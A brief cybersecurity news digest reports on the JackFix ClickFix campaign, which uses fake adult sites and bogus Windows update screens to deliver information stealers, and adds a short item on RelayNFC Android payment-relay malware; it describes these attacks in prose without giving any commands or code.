ClickFix Campaign Uses Fake Adult Sites for Malware

Cybersecurity researchers have identified a new ClickFix campaign that uses fake adult websites to trick users into running malicious commands disguised as Windows security updates. The campaign, codenamed JackFix, leverages malvertising and social engineering to distribute malware. The attack hijacks the entire screen, instructing victims to open the Windows Run dialog and execute a command, triggering the infection sequence. The malware uses obfuscation techniques and blocks users from escaping the full-screen alert. The initial command executed is an MSHTA payload that runs a PowerShell command to retrieve another script from a remote server. This script attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control addresses. The PowerShell script can drop multiple payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, and RedLine Stealer.

Latest mentioned: 11-25

Earliest mentioned: 11-24

Sources

gbhackers.com huntress.com bleepingcomputer.com theregister.com thehackernews.com securityboulevard.com

Also Read

RelayNFC Malware Targets Mobile Payment Users

Cyble Research and Intelligence Labs (CRIL) has identified a new NFC relay malware campaign targeting mobile payment users. The malware, named RelayNFC, turns a victim's Android device into a remote card reader, enabling attackers to perform fraudulent contactless transactions. The malware is distributed through phishing sites and captures card data and PINs, relaying them to an attacker-controlled server. RelayNFC uses a real-time APDU relay channel and has zero detections on VirusTotal, indicating low visibility across security tools.

11-26Read more →